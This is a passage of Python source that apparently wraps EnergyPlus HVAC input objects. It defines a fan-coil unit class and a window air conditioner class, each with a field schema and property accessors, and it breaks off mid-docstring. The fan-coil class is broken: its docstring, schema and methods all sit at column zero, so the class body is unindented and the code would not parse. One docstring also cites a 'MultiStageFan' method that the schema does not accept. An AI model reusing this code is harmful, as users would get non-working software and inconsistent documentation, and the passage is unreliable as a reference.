        """Corresponds to IDD field `Outdoor Air Inlet Node Name`"""
        self["Outdoor Air Inlet Node Name"] = value

    @property
    def demand_controlled_ventilation_type(self):
        """field `Demand Controlled Ventilation Type`

        |  This field controls how the minimum outdoor air flow rate is calculated.
        |  None means that design occupancy will be used to compute the minimum outdoor air flow rate
        |  OccupancySchedule means that current occupancy level will be used.
        |  CO2Setpoint means that the design occupancy will be used to compute the minimum outdoor air flow
        |  rate and the outdoor air flow rate may be increased if necessary to maintain the indoor air carbon
        |  dioxide setpoint defined in a ZoneControl:ContaminantController object.
        |  Default value: None

        Args:
            value (str): value for IDD Field `Demand Controlled Ventilation Type`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `demand_controlled_ventilation_type` or None if not set

        """
        return self["Demand Controlled Ventilation Type"]

    @demand_controlled_ventilation_type.setter
    def demand_controlled_ventilation_type(self, value="None"):
        """Corresponds to IDD field `Demand Controlled Ventilation Type`"""
        self["Demand Controlled Ventilation Type"] = value

    @property
    def outdoor_air_economizer_type(self):
        """field `Outdoor Air Economizer Type`

        |  DifferentialDryBulb and DifferentialEnthalpy will increase the outdoor air flow rate
        |  when there is a cooling load and the outdoor air temperature or enthalpy
        |  is below the zone exhaust air temperature or enthalpy.
        |  Default value: NoEconomizer

        Args:
            value (str): value for IDD Field `Outdoor Air Economizer Type`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `outdoor_air_economizer_type` or None if not set

        """
        return self["Outdoor Air Economizer Type"]

    @outdoor_air_economizer_type.setter
    def outdoor_air_economizer_type(self, value="NoEconomizer"):
        """Corresponds to IDD field `Outdoor Air Economizer Type`"""
        self["Outdoor Air Economizer Type"] = value

    @property
    def heat_recovery_type(self):
        """field `Heat Recovery Type`

        |  Default value: None

        Args:
            value (str): value for IDD Field `Heat Recovery Type`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `heat_recovery_type` or None if not set

        """
        return self["Heat Recovery Type"]

    @heat_recovery_type.setter
    def heat_recovery_type(self, value="None"):
        """Corresponds to IDD field `Heat Recovery Type`"""
        self["Heat Recovery Type"] = value

    @property
    def sensible_heat_recovery_effectiveness(self):
        """field `Sensible Heat Recovery Effectiveness`

        |  Units: dimensionless
        |  Default value: 0.7
        |  value <= 1.0

        Args:
            value (float): value for IDD Field `Sensible Heat Recovery Effectiveness`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `sensible_heat_recovery_effectiveness` or None if not set

        """
        return self["Sensible Heat Recovery Effectiveness"]

    @sensible_heat_recovery_effectiveness.setter
    def sensible_heat_recovery_effectiveness(self, value=0.7):
        """Corresponds to IDD field `Sensible Heat Recovery Effectiveness`"""
        self["Sensible Heat Recovery Effectiveness"] = value

    @property
    def latent_heat_recovery_effectiveness(self):
        """field `Latent Heat Recovery Effectiveness`

        |  Applicable only if Heat Recovery Type is Enthalpy.
        |  Units: dimensionless
        |  Default value: 0.65
        |  value <= 1.0

        Args:
            value (float): value for IDD Field `Latent Heat Recovery Effectiveness`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `latent_heat_recovery_effectiveness` or None if not set

        """
        return self["Latent Heat Recovery Effectiveness"]

    @latent_heat_recovery_effectiveness.setter
    def latent_heat_recovery_effectiveness(self, value=0.65):
        """Corresponds to IDD field `Latent Heat Recovery Effectiveness`"""
        self["Latent Heat Recovery Effectiveness"] = value

    @property
    def design_specification_zonehvac_sizing_object_name(self):
        """field `Design Specification ZoneHVAC Sizing Object Name`

        |  Enter the name of a DesignSpecificationZoneHVACSizing object.

        Args:
            value (str): value for IDD Field `Design Specification ZoneHVAC Sizing Object Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `design_specification_zonehvac_sizing_object_name` or None if not set

        """
        return self["Design Specification ZoneHVAC Sizing Object Name"]

    @design_specification_zonehvac_sizing_object_name.setter
    def design_specification_zonehvac_sizing_object_name(self, value=None):
        """Corresponds to IDD field `Design Specification ZoneHVAC Sizing Object Name`"""
        self["Design Specification ZoneHVAC Sizing Object Name"] = value
class ZoneHvacFourPipeFanCoil(DataObject):
""" Corresponds to IDD object `ZoneHVAC:FourPipeFanCoil`
Four pipe fan coil system. Forced-convection hydronic heating-cooling unit with
supply fan, hot water heating coil, chilled water cooling coil, and fixed-position
outdoor air mixer.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'availability schedule name',
{'name': u'Availability Schedule Name',
'pyname': u'availability_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'capacity control method',
{'name': u'Capacity Control Method',
'pyname': u'capacity_control_method',
'required-field': True,
'autosizable': False,
'accepted-values': [u'ConstantFanVariableFlow',
u'CyclingFan',
u'VariableFanVariableFlow',
u'VariableFanConstantFlow',
u'MultiSpeedFan'],
'autocalculatable': False,
'type': 'alpha'}),
(u'maximum supply air flow rate',
{'name': u'Maximum Supply Air Flow Rate',
'pyname': u'maximum_supply_air_flow_rate',
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s'}),
(u'low speed supply air flow ratio',
{'name': u'Low Speed Supply Air Flow Ratio',
'pyname': u'low_speed_supply_air_flow_ratio',
'default': 0.33,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'medium speed supply air flow ratio',
{'name': u'Medium Speed Supply Air Flow Ratio',
'pyname': u'medium_speed_supply_air_flow_ratio',
'default': 0.66,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'maximum outdoor air flow rate',
{'name': u'Maximum Outdoor Air Flow Rate',
'pyname': u'maximum_outdoor_air_flow_rate',
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s'}),
(u'outdoor air schedule name',
{'name': u'Outdoor Air Schedule Name',
'pyname': u'outdoor_air_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'air inlet node name',
{'name': u'Air Inlet Node Name',
'pyname': u'air_inlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'air outlet node name',
{'name': u'Air Outlet Node Name',
'pyname': u'air_outlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'outdoor air mixer object type',
{'name': u'Outdoor Air Mixer Object Type',
'pyname': u'outdoor_air_mixer_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'OutdoorAir:Mixer'],
'autocalculatable': False,
'type': 'alpha'}),
(u'outdoor air mixer name',
{'name': u'Outdoor Air Mixer Name',
'pyname': u'outdoor_air_mixer_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'supply air fan object type',
{'name': u'Supply Air Fan Object Type',
'pyname': u'supply_air_fan_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Fan:OnOff',
u'Fan:ConstantVolume',
u'Fan:VariableVolume'],
'autocalculatable': False,
'type': 'alpha'}),
(u'supply air fan name',
{'name': u'Supply Air Fan Name',
'pyname': u'supply_air_fan_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'cooling coil object type',
{'name': u'Cooling Coil Object Type',
'pyname': u'cooling_coil_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Coil:Cooling:Water',
u'Coil:Cooling:Water:DetailedGeometry',
u'CoilSystem:Cooling:Water:HeatExchangerAssisted'],
'autocalculatable': False,
'type': 'alpha'}),
(u'cooling coil name',
{'name': u'Cooling Coil Name',
'pyname': u'cooling_coil_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'maximum cold water flow rate',
{'name': u'Maximum Cold Water Flow Rate',
'pyname': u'maximum_cold_water_flow_rate',
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s'}),
(u'minimum cold water flow rate',
{'name': u'Minimum Cold Water Flow Rate',
'pyname': u'minimum_cold_water_flow_rate',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s'}),
(u'cooling convergence tolerance',
{'name': u'Cooling Convergence Tolerance',
'pyname': u'cooling_convergence_tolerance',
'default': 0.001,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'heating coil object type',
{'name': u'Heating Coil Object Type',
'pyname': u'heating_coil_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Water',
u'Coil:Heating:Electric'],
'autocalculatable': False,
'type': 'alpha'}),
(u'heating coil name',
{'name': u'Heating Coil Name',
'pyname': u'heating_coil_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'maximum hot water flow rate',
{'name': u'Maximum Hot Water Flow Rate',
'pyname': u'maximum_hot_water_flow_rate',
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s'}),
(u'minimum hot water flow rate',
{'name': u'Minimum Hot Water Flow Rate',
'pyname': u'minimum_hot_water_flow_rate',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s'}),
(u'heating convergence tolerance',
{'name': u'Heating Convergence Tolerance',
'pyname': u'heating_convergence_tolerance',
'default': 0.001,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'availability manager list name',
{'name': u'Availability Manager List Name',
'pyname': u'availability_manager_list_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'design specification zonehvac sizing object name',
{'name': u'Design Specification ZoneHVAC Sizing Object Name',
'pyname': u'design_specification_zonehvac_sizing_object_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'supply air fan operating mode schedule name',
{'name': u'Supply Air Fan Operating Mode Schedule Name',
'pyname': u'supply_air_fan_operating_mode_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Zone HVAC Forced Air Units',
'min-fields': 24,
'name': u'ZoneHVAC:FourPipeFanCoil',
'pyname': u'ZoneHvacFourPipeFanCoil',
'required-object': False,
'unique-object': False}
@property
def name(self):
    """IDD field `Name`.

    Returns:
        str: current value of `name`, or None when the field is unset.
    """
    return self["Name"]

@name.setter
def name(self, value=None):
    """Assign a new value to IDD field `Name`.

    Args:
        value (str): the value to store.

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Name"] = value
@property
def availability_schedule_name(self):
    """IDD field `Availability Schedule Name`.

    | Availability schedule for this system; a schedule value > 0 means
    | the system is available. A blank field means always available.

    Returns:
        str: current value of `availability_schedule_name`, or None when unset.
    """
    return self["Availability Schedule Name"]

@availability_schedule_name.setter
def availability_schedule_name(self, value=None):
    """Assign a new value to IDD field `Availability Schedule Name`.

    Args:
        value (str): the schedule name to store.

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Availability Schedule Name"] = value
@property
def capacity_control_method(self):
    """IDD field `Capacity Control Method`.

    Returns:
        str: current value of `capacity_control_method`, or None when unset.
    """
    return self["Capacity Control Method"]

@capacity_control_method.setter
def capacity_control_method(self, value=None):
    """Assign a new value to IDD field `Capacity Control Method`.

    Args:
        value (str): the value to store.

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Capacity Control Method"] = value
@property
def maximum_supply_air_flow_rate(self):
    """IDD field `Maximum Supply Air Flow Rate`.

    | Units: m3/s

    Returns:
        float or "Autosize": current value, or None when the field is unset.
    """
    return self["Maximum Supply Air Flow Rate"]

@maximum_supply_air_flow_rate.setter
def maximum_supply_air_flow_rate(self, value=None):
    """Assign a new value to IDD field `Maximum Supply Air Flow Rate`.

    Args:
        value (float or "Autosize"): flow rate in m3/s, or "Autosize".

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Maximum Supply Air Flow Rate"] = value
@property
def low_speed_supply_air_flow_ratio(self):
    """IDD field `Low Speed Supply Air Flow Ratio`.

    | Default value: 0.33

    Returns:
        float: current value, or None when the field is unset.
    """
    return self["Low Speed Supply Air Flow Ratio"]

@low_speed_supply_air_flow_ratio.setter
def low_speed_supply_air_flow_ratio(self, value=0.33):
    """Assign a new value to IDD field `Low Speed Supply Air Flow Ratio`.

    Args:
        value (float): the ratio to store. Defaults to 0.33.

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Low Speed Supply Air Flow Ratio"] = value
@property
def medium_speed_supply_air_flow_ratio(self):
    """IDD field `Medium Speed Supply Air Flow Ratio`.

    | Should be greater than the Low Speed Supply Air Flow Ratio.
    | Default value: 0.66

    Returns:
        float: current value, or None when the field is unset.
    """
    return self["Medium Speed Supply Air Flow Ratio"]

@medium_speed_supply_air_flow_ratio.setter
def medium_speed_supply_air_flow_ratio(self, value=0.66):
    """Assign a new value to IDD field `Medium Speed Supply Air Flow Ratio`.

    Args:
        value (float): the ratio to store. Defaults to 0.66.

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Medium Speed Supply Air Flow Ratio"] = value
@property
def maximum_outdoor_air_flow_rate(self):
    """IDD field `Maximum Outdoor Air Flow Rate`.

    | Units: m3/s

    Returns:
        float or "Autosize": current value, or None when the field is unset.
    """
    return self["Maximum Outdoor Air Flow Rate"]

@maximum_outdoor_air_flow_rate.setter
def maximum_outdoor_air_flow_rate(self, value=None):
    """Assign a new value to IDD field `Maximum Outdoor Air Flow Rate`.

    Args:
        value (float or "Autosize"): flow rate in m3/s, or "Autosize".

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Maximum Outdoor Air Flow Rate"] = value
@property
def outdoor_air_schedule_name(self):
    """IDD field `Outdoor Air Schedule Name`.

    | The schedule value multiplies the maximum outdoor air flow rate.

    Returns:
        str: current value of `outdoor_air_schedule_name`, or None when unset.
    """
    return self["Outdoor Air Schedule Name"]

@outdoor_air_schedule_name.setter
def outdoor_air_schedule_name(self, value=None):
    """Assign a new value to IDD field `Outdoor Air Schedule Name`.

    Args:
        value (str): the schedule name to store.

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Outdoor Air Schedule Name"] = value
@property
def air_inlet_node_name(self):
    """IDD field `Air Inlet Node Name`.

    Returns:
        str: current value of `air_inlet_node_name`, or None when unset.
    """
    return self["Air Inlet Node Name"]

@air_inlet_node_name.setter
def air_inlet_node_name(self, value=None):
    """Assign a new value to IDD field `Air Inlet Node Name`.

    Args:
        value (str): the node name to store.

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Air Inlet Node Name"] = value
@property
def air_outlet_node_name(self):
    """IDD field `Air Outlet Node Name`.

    Returns:
        str: current value of `air_outlet_node_name`, or None when unset.
    """
    return self["Air Outlet Node Name"]

@air_outlet_node_name.setter
def air_outlet_node_name(self, value=None):
    """Assign a new value to IDD field `Air Outlet Node Name`.

    Args:
        value (str): the node name to store.

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Air Outlet Node Name"] = value
@property
def outdoor_air_mixer_object_type(self):
    """IDD field `Outdoor Air Mixer Object Type`.

    | Currently only one type, OutdoorAir:Mixer, is available.

    Returns:
        str: current value of `outdoor_air_mixer_object_type`, or None when unset.
    """
    return self["Outdoor Air Mixer Object Type"]

@outdoor_air_mixer_object_type.setter
def outdoor_air_mixer_object_type(self, value=None):
    """Assign a new value to IDD field `Outdoor Air Mixer Object Type`.

    Args:
        value (str): the object type to store.

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Outdoor Air Mixer Object Type"] = value
@property
def outdoor_air_mixer_name(self):
    """IDD field `Outdoor Air Mixer Name`.

    Returns:
        str: current value of `outdoor_air_mixer_name`, or None when unset.
    """
    return self["Outdoor Air Mixer Name"]

@outdoor_air_mixer_name.setter
def outdoor_air_mixer_name(self, value=None):
    """Assign a new value to IDD field `Outdoor Air Mixer Name`.

    Args:
        value (str): the object name to store.

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Outdoor Air Mixer Name"] = value
@property
def supply_air_fan_object_type(self):
    """IDD field `Supply Air Fan Object Type`.

    | Fan type must match the capacity control method (see I/O reference):
    | ConstantFanVariableFlow -> Fan:OnOff or Fan:ConstantVolume;
    | CyclingFan -> Fan:OnOff;
    | VariableFanVariableFlow or VariableFanConstantFlow -> Fan:VariableVolume.
    | The fan's inlet node should be the outdoor air mixer's mixed air node.

    Returns:
        str: current value of `supply_air_fan_object_type`, or None when unset.
    """
    return self["Supply Air Fan Object Type"]

@supply_air_fan_object_type.setter
def supply_air_fan_object_type(self, value=None):
    """Assign a new value to IDD field `Supply Air Fan Object Type`.

    Args:
        value (str): the object type to store.

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Supply Air Fan Object Type"] = value
@property
def supply_air_fan_name(self):
    """IDD field `Supply Air Fan Name`.

    Returns:
        str: current value of `supply_air_fan_name`, or None when unset.
    """
    return self["Supply Air Fan Name"]

@supply_air_fan_name.setter
def supply_air_fan_name(self, value=None):
    """Assign a new value to IDD field `Supply Air Fan Name`.

    Args:
        value (str): the fan name to store.

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Supply Air Fan Name"] = value
@property
def cooling_coil_object_type(self):
    """IDD field `Cooling Coil Object Type`.

    Returns:
        str: current value of `cooling_coil_object_type`, or None when unset.
    """
    return self["Cooling Coil Object Type"]

@cooling_coil_object_type.setter
def cooling_coil_object_type(self, value=None):
    """Assign a new value to IDD field `Cooling Coil Object Type`.

    Args:
        value (str): the object type to store.

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Cooling Coil Object Type"] = value
@property
def cooling_coil_name(self):
    """IDD field `Cooling Coil Name`.

    Returns:
        str: current value of `cooling_coil_name`, or None when unset.
    """
    return self["Cooling Coil Name"]

@cooling_coil_name.setter
def cooling_coil_name(self, value=None):
    """Assign a new value to IDD field `Cooling Coil Name`.

    Args:
        value (str): the coil name to store.

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Cooling Coil Name"] = value
@property
def maximum_cold_water_flow_rate(self):
    """IDD field `Maximum Cold Water Flow Rate`.

    | Units: m3/s
    | IP-Units: gal/min

    Returns:
        float or "Autosize": current value, or None when the field is unset.
    """
    return self["Maximum Cold Water Flow Rate"]

@maximum_cold_water_flow_rate.setter
def maximum_cold_water_flow_rate(self, value=None):
    """Assign a new value to IDD field `Maximum Cold Water Flow Rate`.

    Args:
        value (float or "Autosize"): flow rate in m3/s, or "Autosize".

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Maximum Cold Water Flow Rate"] = value
@property
def minimum_cold_water_flow_rate(self):
    """IDD field `Minimum Cold Water Flow Rate`.

    | Units: m3/s
    | IP-Units: gal/min

    Returns:
        float: current value, or None when the field is unset.
    """
    return self["Minimum Cold Water Flow Rate"]

@minimum_cold_water_flow_rate.setter
def minimum_cold_water_flow_rate(self, value=None):
    """Assign a new value to IDD field `Minimum Cold Water Flow Rate`.

    Args:
        value (float): flow rate in m3/s.

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Minimum Cold Water Flow Rate"] = value
@property
def cooling_convergence_tolerance(self):
    """IDD field `Cooling Convergence Tolerance`.

    | Default value: 0.001

    Returns:
        float: current value, or None when the field is unset.
    """
    return self["Cooling Convergence Tolerance"]

@cooling_convergence_tolerance.setter
def cooling_convergence_tolerance(self, value=0.001):
    """Assign a new value to IDD field `Cooling Convergence Tolerance`.

    Args:
        value (float): the tolerance to store. Defaults to 0.001.

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Cooling Convergence Tolerance"] = value
@property
def heating_coil_object_type(self):
    """IDD field `Heating Coil Object Type`.

    Returns:
        str: current value of `heating_coil_object_type`, or None when unset.
    """
    return self["Heating Coil Object Type"]

@heating_coil_object_type.setter
def heating_coil_object_type(self, value=None):
    """Assign a new value to IDD field `Heating Coil Object Type`.

    Args:
        value (str): the object type to store.

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Heating Coil Object Type"] = value
@property
def heating_coil_name(self):
    """IDD field `Heating Coil Name`.

    Returns:
        str: current value of `heating_coil_name`, or None when unset.
    """
    return self["Heating Coil Name"]

@heating_coil_name.setter
def heating_coil_name(self, value=None):
    """Assign a new value to IDD field `Heating Coil Name`.

    Args:
        value (str): the coil name to store.

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Heating Coil Name"] = value
@property
def maximum_hot_water_flow_rate(self):
    """IDD field `Maximum Hot Water Flow Rate`.

    | Units: m3/s
    | IP-Units: gal/min

    Returns:
        float or "Autosize": current value, or None when the field is unset.
    """
    return self["Maximum Hot Water Flow Rate"]

@maximum_hot_water_flow_rate.setter
def maximum_hot_water_flow_rate(self, value=None):
    """Assign a new value to IDD field `Maximum Hot Water Flow Rate`.

    Args:
        value (float or "Autosize"): flow rate in m3/s, or "Autosize".

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Maximum Hot Water Flow Rate"] = value
@property
def minimum_hot_water_flow_rate(self):
    """IDD field `Minimum Hot Water Flow Rate`.

    | Units: m3/s
    | IP-Units: gal/min
    | Default value: 0.0 (declared in this object's schema)

    Returns:
        float: current value, or None when the field is unset.
    """
    return self["Minimum Hot Water Flow Rate"]

@minimum_hot_water_flow_rate.setter
def minimum_hot_water_flow_rate(self, value=0.0):
    """Assign a new value to IDD field `Minimum Hot Water Flow Rate`.

    The setter default now mirrors the schema's declared default of 0.0,
    consistent with the other defaulted setters in this class (e.g.
    `heating_convergence_tolerance`, which defaults to its schema value);
    previously the signature used ``value=None`` despite the schema default.

    Args:
        value (float): flow rate in m3/s. Defaults to 0.0.

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Minimum Hot Water Flow Rate"] = value
@property
def heating_convergence_tolerance(self):
    """IDD field `Heating Convergence Tolerance`.

    | Default value: 0.001

    Returns:
        float: current value, or None when the field is unset.
    """
    return self["Heating Convergence Tolerance"]

@heating_convergence_tolerance.setter
def heating_convergence_tolerance(self, value=0.001):
    """Assign a new value to IDD field `Heating Convergence Tolerance`.

    Args:
        value (float): the tolerance to store. Defaults to 0.001.

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Heating Convergence Tolerance"] = value
@property
def availability_manager_list_name(self):
    """IDD field `Availability Manager List Name`.

    | Enter the name of an AvailabilityManagerAssignmentList object.

    Returns:
        str: current value of `availability_manager_list_name`, or None when unset.
    """
    return self["Availability Manager List Name"]

@availability_manager_list_name.setter
def availability_manager_list_name(self, value=None):
    """Assign a new value to IDD field `Availability Manager List Name`.

    Args:
        value (str): the list name to store.

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Availability Manager List Name"] = value
@property
def design_specification_zonehvac_sizing_object_name(self):
    """IDD field `Design Specification ZoneHVAC Sizing Object Name`.

    | Enter the name of a DesignSpecificationZoneHVACSizing object.

    Returns:
        str: current value, or None when the field is unset.
    """
    return self["Design Specification ZoneHVAC Sizing Object Name"]

@design_specification_zonehvac_sizing_object_name.setter
def design_specification_zonehvac_sizing_object_name(self, value=None):
    """Assign a new value to IDD field `Design Specification ZoneHVAC
    Sizing Object Name`.

    Args:
        value (str): the object name to store.

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Design Specification ZoneHVAC Sizing Object Name"] = value
@property
def supply_air_fan_operating_mode_schedule_name(self):
    """IDD field `Supply Air Fan Operating Mode Schedule Name`.

    | Name of a schedule that controls fan operation. Schedule values of 0
    | denote cycling fan operation (fan cycles with the cooling coil);
    | values greater than 0 denote constant fan operation (fan runs
    | continually regardless of coil operation). Left blank, the fan
    | operating mode defaults to cycling operation.
    | Currently used with the MultiStageFan capacity control method.

    Returns:
        str: current value, or None when the field is unset.
    """
    return self["Supply Air Fan Operating Mode Schedule Name"]

@supply_air_fan_operating_mode_schedule_name.setter
def supply_air_fan_operating_mode_schedule_name(self, value=None):
    """Assign a new value to IDD field `Supply Air Fan Operating Mode
    Schedule Name`.

    Args:
        value (str): the schedule name to store.

    Raises:
        ValueError: if `value` is rejected by field validation.
    """
    self["Supply Air Fan Operating Mode Schedule Name"] = value
class ZoneHvacWindowAirConditioner(DataObject):
    """Corresponds to IDD object `ZoneHVAC:WindowAirConditioner`.

    Window air conditioner: a forced-convection, cooling-only unit made up
    of a supply fan, a direct expansion (DX) cooling coil, and a
    fixed-position outdoor air mixer.
    """

    _schema = {
        'extensible-fields': OrderedDict(),
        'fields': OrderedDict([
            (u'name',
             {'name': u'Name',
              'pyname': u'name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'alpha'}),
            (u'availability schedule name',
             {'name': u'Availability Schedule Name',
              'pyname': u'availability_schedule_name',
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'}),
            (u'maximum supply air flow rate',
             {'name': u'Maximum Supply Air Flow Rate',
              'pyname': u'maximum_supply_air_flow_rate',
              'required-field': True,
              'autosizable': True,
              'autocalculatable': False,
              'type': u'real',
              'unit': u'm3/s'}),
            (u'maximum outdoor air flow rate',
             {'name': u'Maximum Outdoor Air Flow Rate',
              'pyname': u'maximum_outdoor_air_flow_rate',
              'required-field': True,
              'autosizable': True,
              'autocalculatable': False,
              'type': u'real',
              'unit': u'm3/s'}),
            (u'air inlet node name',
             {'name': u'Air Inlet Node Name',
              'pyname': u'air_inlet_node_name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'node'}),
            (u'air outlet node name',
             {'name': u'Air Outlet Node Name',
              'pyname': u'air_outlet_node_name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'node'}),
            (u'outdoor air mixer object type',
             {'name': u'Outdoor Air Mixer Object Type',
              'pyname': u'outdoor_air_mixer_object_type',
              'required-field': True,
              'autosizable': False,
              'accepted-values': [u'OutdoorAir:Mixer'],
              'autocalculatable': False,
              'type': 'alpha'}),
            (u'outdoor air mixer name',
             {'name': u'Outdoor Air Mixer Name',
              'pyname': u'outdoor_air_mixer_name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'}),
            (u'supply air fan object type',
             {'name': u'Supply Air Fan Object Type',
              'pyname': u'supply_air_fan_object_type',
              'required-field': True,
              'autosizable': False,
              'accepted-values': [u'Fan:OnOff',
                                  u'Fan:ConstantVolume'],
              'autocalculatable': False,
              'type': 'alpha'}),
            (u'supply air fan name',
             {'name': u'Supply Air Fan Name',
              'pyname': u'supply_air_fan_name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'}),
            (u'cooling coil object type',
             {'name': u'Cooling Coil Object Type',
              'pyname': u'cooling_coil_object_type',
              'required-field': True,
              'autosizable': False,
              'accepted-values': [u'Coil:Cooling:DX:SingleSpeed',
                                  u'CoilSystem:Cooling:DX:HeatExchangerAssisted'],
              'autocalculatable': False,
              'type': 'alpha'}),
            (u'dx cooling coil name',
             {'name': u'DX Cooling Coil Name',
              'pyname': u'dx_cooling_coil_name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'}),
            (u'supply air fan operating mode schedule name',
             {'name': u'Supply Air Fan Operating Mode Schedule Name',
              'pyname': u'supply_air_fan_operating_mode_schedule_name',
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'}),
            (u'fan placement',
             {'name': u'Fan Placement',
              'pyname': u'fan_placement',
              'required-field': True,
              'autosizable': False,
              'accepted-values': [u'BlowThrough',
                                  u'DrawThrough'],
              'autocalculatable': False,
              'type': 'alpha'}),
            (u'cooling convergence tolerance',
             {'name': u'Cooling Convergence Tolerance',
              'pyname': u'cooling_convergence_tolerance',
              'default': 0.001,
              'minimum>': 0.0,
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'real'}),
            (u'availability manager list name',
             {'name': u'Availability Manager List Name',
              'pyname': u'availability_manager_list_name',
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'}),
            (u'design specification zonehvac sizing object name',
             {'name': u'Design Specification ZoneHVAC Sizing Object Name',
              'pyname': u'design_specification_zonehvac_sizing_object_name',
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'})]),
        'format': None,
        'group': u'Zone HVAC Forced Air Units',
        'min-fields': 15,
        'name': u'ZoneHVAC:WindowAirConditioner',
        'pyname': u'ZoneHvacWindowAirConditioner',
        'required-object': False,
        'unique-object': False}

    @property
    def name(self):
        """IDD field `Name`.

        Returns:
            str: current value of `name`, or None when the field is unset.
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Assign a new value to IDD field `Name`.

        Args:
            value (str): the value to store.

        Raises:
            ValueError: if `value` is rejected by field validation.
        """
        self["Name"] = value

    @property
    def availability_schedule_name(self):
        """IDD field `Availability Schedule Name`.

        | Availability schedule for this system; a schedule value > 0 means
        | the system is available. A blank field means always available.

        Returns:
            str: current value, or None when the field is unset.
        """
        return self["Availability Schedule Name"]

    @availability_schedule_name.setter
    def availability_schedule_name(self, value=None):
        """Assign a new value to IDD field `Availability Schedule Name`.

        Args:
            value (str): the schedule name to store.

        Raises:
            ValueError: if `value` is rejected by field validation.
        """
        self["Availability Schedule Name"] = value

    @property
    def maximum_supply_air_flow_rate(self):
        """IDD field `Maximum Supply Air Flow Rate`.

        | Units: m3/s

        Returns:
            float or "Autosize": current value, or None when the field is unset.
        """
